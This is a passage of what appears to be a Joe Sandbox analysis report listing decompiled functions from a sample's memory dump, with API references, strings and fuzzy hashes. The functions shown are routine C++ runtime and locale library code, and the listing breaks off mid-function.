Opcode Fuzzy Hash: bb5b11a0980b0aaf2d1b9e86abbf00709921517520bbcf2d4516f6415f5073dd
Instruction Fuzzy Hash: E901C431901119A7CF05EBA2D812BBE7234AF84724F64152FF5117B2E1DF7C99058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00439C0B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00439C0B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464594; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00439B81(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464594 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x00439c0b
0x00439c12
0x00439c1c
0x00439c21
0x00439c27
0x00439c30
0x00439c33
0x00439c38
0x00439c3c
0x00439c41
0x00439c45
0x00439c49
0x00439c4f
0x00439c55
0x00439c56
0x00439c5d
0x00439c60
0x00439c6a
0x00439c78
0x00439c78
0x00439c7d
0x00439c82
0x00439c88
0x00439c8e
0x00439c4b
0x00439c4b
0x00439c4b
0x00439c49
0x00439c94
0x00439c9b
0x00439ca7

APIs

__EH_prolog3.LIBCMT ref: 00439C12
std::_Lockit::_Lockit.LIBCPMT ref: 00439C1C

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 00439C56
std::bad_exception::bad_exception.LIBCMT ref: 00439C6A
__CxxThrowException@8.LIBCMT ref: 00439C78
std::locale::facet::_Facet_Register.LIBCPMT ref: 00439C8E

Strings

bad cast, xrefs: 00439C62

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 1676052248-3145022300
Opcode ID: 544b4ff3c1df8fdde798ed7b170ec3643b0a28d6761c710a906ddd43bac91b3c
Instruction ID: ab7671e176bece3a45d5f88f0e1a69b493702001256d61cc8bf0367823720bc0
Opcode Fuzzy Hash: 544b4ff3c1df8fdde798ed7b170ec3643b0a28d6761c710a906ddd43bac91b3c
Instruction Fuzzy Hash: 9801C431900215ABCF05FBA19912ABE72756F88324F64012FF5117B2E2DFBC9D05879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043DE22 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DE22(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645e4; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043D10C(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645e4 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043de22
0x0043de29
0x0043de33
0x0043de38
0x0043de3e
0x0043de47
0x0043de4a
0x0043de4f
0x0043de53
0x0043de58
0x0043de5c
0x0043de60
0x0043de66
0x0043de6c
0x0043de6d
0x0043de74
0x0043de77
0x0043de81
0x0043de8f
0x0043de8f
0x0043de94
0x0043de99
0x0043de9f
0x0043dea5
0x0043de62
0x0043de62
0x0043de62
0x0043de60
0x0043deab
0x0043deb2
0x0043debe

APIs

__EH_prolog3.LIBCMT ref: 0043DE29
std::_Lockit::_Lockit.LIBCPMT ref: 0043DE33

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043DE6D
std::bad_exception::bad_exception.LIBCMT ref: 0043DE81
__CxxThrowException@8.LIBCMT ref: 0043DE8F
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DEA5

Strings

bad cast, xrefs: 0043DE79

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 1676052248-3145022300
Opcode ID: e78c64e84cd0d9d103113175209699b5b5213938913dc59d296d05aa74671696
Instruction ID: b07cb240c4e2ebf85ad142d1a60faab76d2006f12228d82108a38b1e4ff765e4
Opcode Fuzzy Hash: e78c64e84cd0d9d103113175209699b5b5213938913dc59d296d05aa74671696
Instruction Fuzzy Hash: EB01ED32D00615ABCF05FBA1E802AAE7335AF94328F64052FF4107B2E1DB7C9A04879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043DF5C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DF5C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645ec; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043D220(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645ec =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043df5c
0x0043df63
0x0043df6d
0x0043df72
0x0043df78
0x0043df81
0x0043df84
0x0043df89
0x0043df8d
0x0043df92
0x0043df96
0x0043df9a
0x0043dfa0
0x0043dfa6
0x0043dfa7
0x0043dfae
0x0043dfb1
0x0043dfbb
0x0043dfc9
0x0043dfc9
0x0043dfce
0x0043dfd3
0x0043dfd9
0x0043dfdf
0x0043df9c
0x0043df9c
0x0043df9c
0x0043df9a
0x0043dfe5
0x0043dfec
0x0043dff8

APIs

__EH_prolog3.LIBCMT ref: 0043DF63
std::_Lockit::_Lockit.LIBCPMT ref: 0043DF6D

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

std::bad_exception::bad_exception.LIBCMT ref: 0043DFBB
__CxxThrowException@8.LIBCMT ref: 0043DFC9
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DFDF

Strings

bad cast, xrefs: 0043DFB3
$FF, xrefs: 0043DF7C

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: $FF$bad cast
API String ID: 2227438316-3438392633
Opcode ID: db7106fda512e1c537b4164f3b2220c0af456ae35dc4cc44975baf79150e4116
Instruction ID: be7ea4e4634ec47fa2807374ab80c53040c5ea74c119ee1bcb3064de77721b65
Opcode Fuzzy Hash: db7106fda512e1c537b4164f3b2220c0af456ae35dc4cc44975baf79150e4116
Instruction Fuzzy Hash: D201AD31D00215A7CF05EBA1A942ABE7235AF84328F64052FF4117B2E1DB7C9A048B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00448F93 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00448F93(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464670; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00448CE3(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464670 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x00448f93
0x00448f9a
0x00448fa4
0x00448fa9
0x00448faf
0x00448fb8
0x00448fbb
0x00448fc0
0x00448fc4
0x00448fc9
0x00448fcd
0x00448fd1
0x00448fd7
0x00448fdd
0x00448fde
0x00448fe5
0x00448fe8
0x00448ff2
0x00449000
0x00449000
0x00449005
0x0044900a
0x00449010
0x00449016
0x00448fd3
0x00448fd3
0x00448fd3
0x00448fd1
0x0044901c
0x00449023
0x0044902f

APIs

__EH_prolog3.LIBCMT ref: 00448F9A
std::_Lockit::_Lockit.LIBCPMT ref: 00448FA4

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 00448FDE
std::bad_exception::bad_exception.LIBCMT ref: 00448FF2
__CxxThrowException@8.LIBCMT ref: 00449000
std::locale::facet::_Facet_Register.LIBCPMT ref: 00449016

Strings

bad cast, xrefs: 00448FEA

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 1676052248-3145022300
Opcode ID: 6716fd5fe967c37d2ed711484704f0f7fd6435cd0d3662e6bae6b45859146763
Instruction ID: a828f724a0f49e24cac65fba449652ea4cc7f23343245bd59c30608841b46b0c
Opcode Fuzzy Hash: 6716fd5fe967c37d2ed711484704f0f7fd6435cd0d3662e6bae6b45859146763
Instruction Fuzzy Hash: 4101AD3190022597DF05EBA1D802BBE7235AF80328F64052FF4107B2E2DF7C9905979D

Uniqueness

Uniqueness Score: -1.00%

Function 00427EBD Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00427EBD(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_push(8);
				_push(0x45bed8);
				E0042A1F0(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x455a20;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x461058;
				E0042BD94(0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E00427F5F();
				E0042BD94(0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x461018; // 0x22381f8
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E004284A2( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E0042A235(E00427F68());
			}

0x00427ebd
0x00427ebf
0x00427ec4
0x00427ece
0x00427ed4
0x00427ed7
0x00427ede
0x00427ee5
0x00427ee8
0x00427eeb
0x00427ef2
0x00427ef9
0x00427f02
0x00427f08
0x00427f0f
0x00427f15
0x00427f1c
0x00427f23
0x00427f29
0x00427f2c
0x00427f2f
0x00427f34
0x00427f36
0x00427f3b
0x00427f3b
0x00427f41
0x00427f47
0x00427f58

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0045BED8,00000008,00427FC5,00000000,00000000,?,?,00427FF2,?,00423103,004027E5,B51EC2B3), ref: 00427ECE
__lock.LIBCMT ref: 00427F02

Part of subcall function 0042BD94: __mtinitlocknum.LIBCMT ref: 0042BDAA
Part of subcall function 0042BD94: __amsg_exit.LIBCMT ref: 0042BDB6
Part of subcall function 0042BD94: EnterCriticalSection.KERNEL32(?,?,?,00427F07,0000000D), ref: 0042BDBE

InterlockedIncrement.KERNEL32(00461058), ref: 00427F0F
__lock.LIBCMT ref: 00427F23
___addlocaleref.LIBCMT ref: 00427F41

Strings

KERNEL32.DLL, xrefs: 00427EC9
ZE, xrefs: 00427ED7

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: ZE$KERNEL32.DLL
API String ID: 637971194-1183941762
Opcode ID: 5104dfef92981f6cf692774da5376e6764f52ed3dcca42d6862141aebd78da11
Instruction ID: 33ec8e0850995df039ca26ad5e9a25153c0105e041f973a7137e982aeeee107e
Opcode Fuzzy Hash: 5104dfef92981f6cf692774da5376e6764f52ed3dcca42d6862141aebd78da11
Instruction Fuzzy Hash: C401A571544B40DFD7209F66E806349F7E0AF50325F50894FE89A963A1CBB8A644CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416210 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 352
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00416210(intOrPtr __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				signed int _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr _v136;
				signed int _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* __edi;
				void* __esi;
				void* _t211;
				intOrPtr* _t218;
				intOrPtr _t227;
				intOrPtr* _t235;
				signed int _t237;
				void* _t239;
				intOrPtr _t252;
				intOrPtr* _t253;
				intOrPtr* _t256;
				intOrPtr* _t270;
				signed int _t272;
				signed int _t283;
				signed int _t295;
				intOrPtr _t296;
				intOrPtr _t341;
				intOrPtr _t343;
				signed int _t347;
				intOrPtr _t355;
				signed int _t379;
				signed int _t381;
				void* _t389;
				intOrPtr _t393;
				intOrPtr* _t395;
				intOrPtr* _t398;
				intOrPtr _t399;
				void* _t400;
				void* _t401;
				void* _t405;
				void* _t412;
				void* _t415;
				void* _t417;

				_push(0xffffffff);
				_push(E0044EC41);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t399;
				_t400 = _t399 - 0x94;
				_push(_t393);
				_push(_t389);
				_v104 = __ecx;
				_v100 = 0;
				E00417FD0( &_v32);
				_v8 = 1;
				E00417F80( &_v32, __eflags);
				E00417D50( &_v32, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_v104 + 0xf4)) + 0x18)));
				_v36 = 0;
				while(_v36 < 0x6d) {
					_v112 = _v36;
					_v108 = 0;
					_v116 =  *((intOrPtr*)(_v104 + 0xf4));
					_t405 = _v108 -  *((intOrPtr*)(_v116 + 0x1c));
					if(_t405 < 0 || _t405 <= 0 && _v112 <  *((intOrPtr*)(_v116 + 0x18))) {
						_t393 =  *((intOrPtr*)(_v104 + 0xf4));
						_t270 = E00417E40( &_v32, _v36);
						_t347 = _v36;
						 *_t270 =  *((intOrPtr*)(_t393 + 0x50 + _t347 * 8));
						 *((intOrPtr*)(_t270 + 4)) =  *((intOrPtr*)(_t393 + 0x54 + _t347 * 8));
						_t272 = _v36 + 1;
						__eflags = _t272;
						_v36 = _t272;
						continue;
					} else {
					}
					break;
				}
				_t38 =  &_a8; // 0x414fe3
				_t407 =  *_t38 & 0x000000ff;
				if(( *_t38 & 0x000000ff) == 0) {
					_v84 = 0x6d;
					_v88 = 0;
					while(1) {
						_t211 = E00417E20(_v104 + 0x124);
						__eflags = _v88 - _t211;
						if(_v88 >= _t211) {
							goto L46;
						}
						_v152 = _v84;
						_t395 = E00417E40( &_v32, _v152);
						_t218 = E00417E40(_v104 + 0x124, _v88);
						 *_t395 =  *_t218;
						 *((intOrPtr*)(_t395 + 4)) =  *((intOrPtr*)(_t218 + 4));
						_v84 = _v84 + 1;
						_v160 = _v84;
						_v156 = 0;
						_v164 =  *((intOrPtr*)(_v104 + 0xf4));
						_t355 = _v164;
						__eflags = _v160 -  *((intOrPtr*)(_t355 + 0x18));
						if(_v160 !=  *((intOrPtr*)(_t355 + 0x18))) {
							L45:
							_t295 = _v88 + 1;
							__eflags = _t295;
							_v88 = _t295;
							continue;
						} else {
							_t296 = _v164;
							__eflags = _v156 -  *((intOrPtr*)(_t296 + 0x1c));
							if(_v156 !=  *((intOrPtr*)(_t296 + 0x1c))) {
								goto L45;
							} else {
							}
						}
						goto L46;
					}
				} else {
					E00417F80(_v104 + 0x114, _t407);
					E00417F80(_v104 + 0x124, _t407);
					_v120 =  *((intOrPtr*)(_v104 + 0xf4));
					if( *((intOrPtr*)(_v120 + 0x1c)) > 0 ||  *((intOrPtr*)(_v120 + 0x18)) > 0x6d) {
						_v124 =  *((intOrPtr*)(_v104 + 0xf4));
						if( *((intOrPtr*)(_v124 + 0x4c)) > 0) {
							L14:
							_push( *((intOrPtr*)( *((intOrPtr*)(_v104 + 0xfc)))));
							_t227 = E0040E131(_v104, _t389, _t393, _t411);
							_t401 = _t400 + 4;
							_v92 = _t227;
							_v40 = _v92;
							_v56 = 0x6d;
							_v52 = 0;
							_v48 = 0;
							_v44 = 0;
							_v72 = 0;
							_v68 = 0;
							while(1) {
								_v128 =  *((intOrPtr*)(_v104 + 0xf4));
								_t412 = _v68 -  *((intOrPtr*)(_v128 + 0x4c));
								if(_t412 > 0 || _t412 >= 0 && _v72 >=  *((intOrPtr*)(_v128 + 0x48))) {
									break;
								}
								_t414 = _v72 | _v68;
								if((_v72 | _v68) != 0) {
									asm("sbb edx, 0x0");
									_v56 = _v56 - 1;
									_t235 = E00417E40( &_v32, _v56);
									_v64 =  *_t235;
									_v60 =  *((intOrPtr*)(_t235 + 4));
									_t237 = _v48 - 1;
									__eflags = _t237;
									asm("sbb ecx, 0x0");
									_v48 = _t237;
								} else {
									_t341 =  *((intOrPtr*)(_v104 + 0xf4));
									_v64 =  *((intOrPtr*)(_t341 + 0x40));
									_v60 =  *((intOrPtr*)(_t341 + 0x44));
								}
								E00417E60(_v104 + 0x114,  &_v64);
								_t239 = E00417E20(_v104 + 0x114);
								E00417D50(_v104 + 0x124, _t414, E00423BC0(_t239, 0, E00427900( *((intOrPtr*)( *((intOrPtr*)(_v104 + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)(_v104 + 0xfc)) + 4)), 4, 0),  *((intOrPtr*)( *((intOrPtr*)(_v104 + 0xfc)) + 4))));
								E00415C30(_v104, 0, _t239, _v64, _v60, _v40,  *((intOrPtr*)( *((intOrPtr*)(_v104 + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)(_v104 + 0xfc)) + 4)));
								_v80 = 0;
								_v76 = 0;
								while(1) {
									_v132 =  *((intOrPtr*)(_v104 + 0xfc));
									_t415 = _v76 -  *((intOrPtr*)(_v132 + 4));
									if(_t415 > 0 || _t415 >= 0 && _v80 >=  *_v132) {
										break;
									}
									_v136 =  *((intOrPtr*)(_v104 + 0xf4));
									_t417 = _v52 -  *((intOrPtr*)(_v136 + 0x1c));
									if(_t417 < 0 || _t417 <= 0 && _v56 <  *((intOrPtr*)(_v136 + 0x18))) {
										_t252 = E00413060(_v80 + _v40);
										_t401 = _t401 + 4;
										_t253 = E00417E40( &_v32, _v56);
										 *_t253 = _t252;
										 *((intOrPtr*)(_t253 + 4)) = 0;
										_v140 = _v48;
										_t398 = E00417E40(_v104 + 0x124, _v140);
										_t256 = E00417E40( &_v32, _v56);
										 *_t398 =  *_t256;
										 *((intOrPtr*)(_t398 + 4)) =  *((intOrPtr*)(_t256 + 4));
										asm("adc ecx, 0x0");
										_v48 = _v48 + 1;
										_t379 = _v56 + 1;
										__eflags = _t379;
										asm("adc eax, 0x0");
										_v56 = _t379;
										_t381 = _v80 + 4;
										__eflags = _t381;
										asm("adc eax, 0x0");
										_v80 = _t381;
										continue;
									} else {
									}
									break;
								}
								asm("adc ecx, 0x0");
								_v72 = _v72 + 1;
							}
							_v148 = E00417E20(_v104 + 0x124);
							_v144 = 0;
							__eflags = _v148 - _v48;
							if(_v148 != _v48) {
								L36:
								__eflags = _v104 + 0x124;
								E00417D50(_v104 + 0x124, _v104 + 0x124, _v48);
							} else {
								__eflags = _v144 - _v44;
								if(_v144 != _v44) {
									goto L36;
								}
							}
							_v96 = _v40;
							_push(_v96);
							E00422D00();
						} else {
							_t343 = _v124;
							_t411 =  *((intOrPtr*)(_t343 + 0x48));
							if( *((intOrPtr*)(_t343 + 0x48)) > 0) {
								goto L14;
							}
						}
					}
				}
				L46:
				E00417B50(_a4,  &_v32);
				_t283 = _v100 | 0x00000001;
				__eflags = _t283;
				_v100 = _t283;
				_v8 = 0;
				E00417D00( &_v32);
				_t205 =  &_v16; // 0x414fe3
				 *[fs:0x0] =  *_t205;
				return _a4;
			}

0x00416213
0x00416215
0x00416220
0x00416221
0x00416228
0x0041622e
0x0041622f
0x00416230
0x00416233
0x0041623d
0x00416242
0x0041624c
0x00416261
0x00416266
0x00416278
0x0041628c
0x0041628f
0x00416292
0x0041629b
0x0041629e
0x004162b4
0x004162c1
0x004162c6
0x004162cd
0x004162d3
0x00416272
0x00416272
0x00416275
0x00000000
0x00000000
0x004162ad
0x00000000
0x0041629e
0x004162d8
0x004162dc
0x004162de
0x00416602
0x00416609
0x0041661b
0x00416624
0x00416629
0x0041662c
0x00000000
0x00000000
0x00416635
0x0041664a
0x00416659
0x00416660
0x00416665
0x0041666e
0x0041667f
0x00416685
0x0041668b
0x00416691
0x0041669d
0x004166a0
0x004166b5
0x00416615
0x00416615
0x00416618
0x00000000
0x004166a2
0x004166a2
0x004166ae
0x004166b1
0x00000000
0x00000000
0x004166b3
0x004166b1
0x00000000
0x004166a0
0x004162e4
0x004162ed
0x004162fb
0x00416309
0x00416313
0x0041632b
0x00416335
0x00416344
0x0041634f
0x00416350
0x00416355
0x00416358
0x0041635e
0x00416361
0x00416368
0x0041636f
0x00416376
0x0041637d
0x00416384
0x0041639f
0x004163a8
0x004163b1
0x004163b4
0x00000000
0x00000000
0x004163ce
0x004163d1
0x004163f3
0x004163f6
0x00416403
0x0041640a
0x00416410
0x00416416
0x00416416
0x0041641c
0x0041641f
0x004163d3
0x004163d6
0x004163df
0x004163e5
0x004163e5
0x00416432
0x00416440
0x00416475
0x00416499
0x0041649e
0x004164a5
0x004164c0
0x004164c9
0x004164d2
0x004164d5
0x00000000
0x00000000
0x004164f4
0x00416503
0x00416506
0x00416526
0x0041652b
0x00416539
0x0041653e
0x00416540
0x00416546
0x00416561
0x0041656a
0x00416571
0x00416576
0x00416582
0x00416585
0x0041658e
0x0041658e
0x00416594
0x00416597
0x004164b1
0x004164b1
0x004164b7
0x004164ba
0x00000000
0x00000000
0x00416518
0x00000000
0x00416506
0x00416396
0x00416399
0x0041639c
0x004165b7
0x004165bd
0x004165c9
0x004165cc
0x004165d9
0x004165e0
0x004165e6
0x004165ce
0x004165d4
0x004165d7
0x00000000
0x00000000
